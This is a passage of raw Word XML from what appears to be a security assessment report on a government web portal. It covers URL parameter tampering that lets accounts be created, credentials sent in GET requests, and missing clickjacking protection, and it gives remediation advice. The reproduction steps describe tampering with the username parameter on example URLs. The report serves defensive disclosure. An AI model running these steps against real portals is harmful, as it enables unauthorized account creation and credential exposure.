        <w:t xml:space="preserve">The application exposes sensitive user information, specifically username and password details, directly within the URL parameters. This vulnerability allows an authenticated or unauthenticated attacker to manipulate these URL parameters, such as changing the username value, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to bypass</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> intended access controls. By altering these parameters, an attacker can exploit this weakness to create new user accounts or modify existing account details without proper authorization. The exposure of sensitive data in the URL also poses a risk of information leakage through browser history, proxy logs, or referrer headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3089FB" w14:textId="602BFBB7" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A62B0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>This vulnerability presents significant risks across several key business areas. From a financial perspective, unauthorized account creation or modification could lead to fraudulent activities, account takeovers, or the misuse of resources, potentially resulting in direct financial losses. Compliance with regulatory frameworks such as NIST CSF, which the government portal must adhere to, could be severely compromised due to the lack of proper access controls and the exposure of Personally Identifiable Information (PII). This could lead to substantial penalties, legal liabilities, and reputational damage for the organization. Furthermore, the integrity of user data is at risk, as unauthorized parties could alter user profiles, compromise data accuracy, and erode user trust. The public perception of the organization's security posture would also be negatively affected, impacting user confidence and potentially leading to a decline in public engagement with the portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918C131" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B86B0A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEF2A3D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement a robust, centralized access control mechanism that enforces the principle of least privilege across all user actions. Ensure that all sensitive operations, especially those involving account creation, modification, or password resets, are protected by strong server-side authorization checks, regardless of information presented in the client-side request. Redesign application workflows to avoid transmitting sensitive data like usernames and passwords directly in URL parameters (GET requests). Instead, use POST requests with encrypted payloads or secure server-side session management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28342434" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735DA1A6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tactical FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F5770" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Implement server-side validation and authorization checks for all requests involving user account management. Before processing any request to create or modify an account, verify that the authenticated user has the necessary privileges for that specific action and that the target account is within their authorized scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A4085" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Never expose sensitive information such as usernames or passwords in URL parameters. Always use HTTP POST requests for operations involving sensitive data, and ensure data is transmitted securely (e.g., over HTTPS) and processed on the server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAA308A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3. Implement robust input validation on all user-supplied data to prevent manipulation of parameters used for account identification or creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515127F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4. When identifying users or accounts in URLs, use indirect references (e.g., UUIDs or GUIDs) instead of direct, predictable identifiers (like sequential IDs or usernames). Map these indirect references to actual identifiers on the server-side, tied to the authenticated user's session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74736F58" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5. Ensure that password handling includes proper hashing and salting, and that passwords are never stored or transmitted in plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8381AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F128351" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. An attacker navigates to an application page where user-related data, including what appears to be a username and password, is exposed directly in the URL query string (e.g., example.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>register?username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>testuser&amp;password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>testpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>). 2. The attacker modifies the 'username' parameter in the URL to a new, arbitrary value (e.g., username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>newattackeraccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) while keeping the exposed password parameter. 3. The attacker submits the modified URL request by navigating to it directly in the browser or via a tool. 4. The system processes the request, and a new user account named '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>newattackeraccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' is successfully created without proper authorization or verification of the initiating user's intent or permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1444A07B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD514C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• OWASP Top 10 2021 - A01:2021-Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB49672" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• CWE-639: Authorization Bypass Through User-Controlled Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC51FB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• NIST SP 800-53: AC-3 Access Enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E1D75D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FC1B6"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550FB44F"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74871C0F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Sensitive Data Exposure in URL (GET Request for Credentials)</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7E4C6D72" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56852B51"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2AE0C452"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DB9C7D"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D0F4DFC" w14:textId="7CCDE7D1"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-006</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F2FAFF0"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37D5989" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="1DE3160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BD858D5"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5D48B18" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A07:2021-Identification and Authentication Failures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5E8D589"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054BCFE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-598</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7E307DE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BD17F8F"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F176971"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034DB62"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6D11571" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="20DD854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55A9EF9"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09175C6"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75FF311"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6FC8741" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="694CDFF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D4FE01E"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C55D67C"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41228FD"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7BB58DC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4537E94E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE3D7D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The login functionality of the government portal utilizes a GET request method to transmit user credentials, specifically the username and password. This practice results in sensitive authentication information being appended directly to the URL in the browser's address bar after a successful or attempted login. When credentials are sent via a GET request, they are stored in browser history, server logs, and can be exposed through various means such as web server access logs, proxy server logs, browser caches, and network sniffing. This makes the credentials highly vulnerable to exposure to unauthorized individuals, increasing the risk of account compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089AA52" w14:textId="34CFE720" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C57D153" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exposing user credentials, such as usernames and passwords, directly in the URL represents a severe security flaw that can lead to significant business consequences for the government portal. This vulnerability could result in widespread account takeovers, compromising citizen and employee data, and leading to identity theft. For C-level executives, this translates directly to substantial financial losses due to potential data breach remediation costs, legal penalties associated with non-compliance with regulations like NIST CSF which mandates protection of PII, and potential lawsuits. The incident would cause severe reputational damage, eroding public trust in the government's ability to safeguard sensitive information. This loss of trust can lead to reduced public engagement and increased scrutiny from regulatory bodies. Furthermore, the compromise of credentials can lead to unauthorized access to other government systems, jeopardizing data integrity across the entire infrastructure and potentially disrupting critical government services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20062636" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F49CEB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):Implement</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> secure session management and authentication protocols across the application. Ensure that all sensitive data, particularly authentication credentials, are transmitted exclusively via POST requests over HTTPS. Re-evaluate the application's overall data handling and transmission architecture to ensure that sensitive information is never exposed in URLs, referrer headers, or client-side logs. Adopt a "security by design" principle for all new features and updates, emphasizing secure data transmission and storage practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113498CC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D69125" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278AF369" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Modify the login form to use the POST method instead of GET for submitting usernames and passwords. This ensures that credentials are sent in the body of the HTTP request, not in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8DB1D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Ensure that the login page and all sensitive pages are served exclusively over HTTPS to encrypt the entire communication channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EAA474" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement HTTP Strict Transport Security (HSTS) to force browsers to interact with the application only over HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3C377" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Configure web servers and application logic to prevent caching of pages containing sensitive information, especially login forms or pages displayed immediately after login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E9774" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement robust server-side validation for all input fields to prevent other forms of injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE51435" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514511A4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Navigate to the government portal's login page. 2. Enter valid or invalid credentials into the username and password fields. 3. Click the "Login" or "Submit" button. 4. Observe the browser's address bar. The username and password will be visible as parameters in the URL (e.g., https://gov.example.com/login?username=testuser&amp;password=testpassword).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C298FE" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01742F01" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/2021/A07_2021-Identification_and_Authentication_Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613BEDF6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/598.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5324E3D6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://www.nist.gov/cyberframework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49457C82" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C6530F"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6726D303"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186D1309" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Missing X-Frame-Options Header (Clickjacking)</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2B7FF6AB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="577A1293"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4F42414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1276E3E"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0BCF605" w14:textId="654B523D"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-005</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C37122E"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7C15762" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="27F34C9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BCF82EF"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2DED681"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9D7D7DF"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8816B04" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-1021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="05AC5B8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BCE62BF"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7AF1911"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3619FA8"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336BAE3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0CD6D02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040F5D5"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723BC68"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0FF94F5"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802572A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6B5BCD5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7FB7528"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4CA39F9"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D1EF960"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8518B59" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BE268B0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
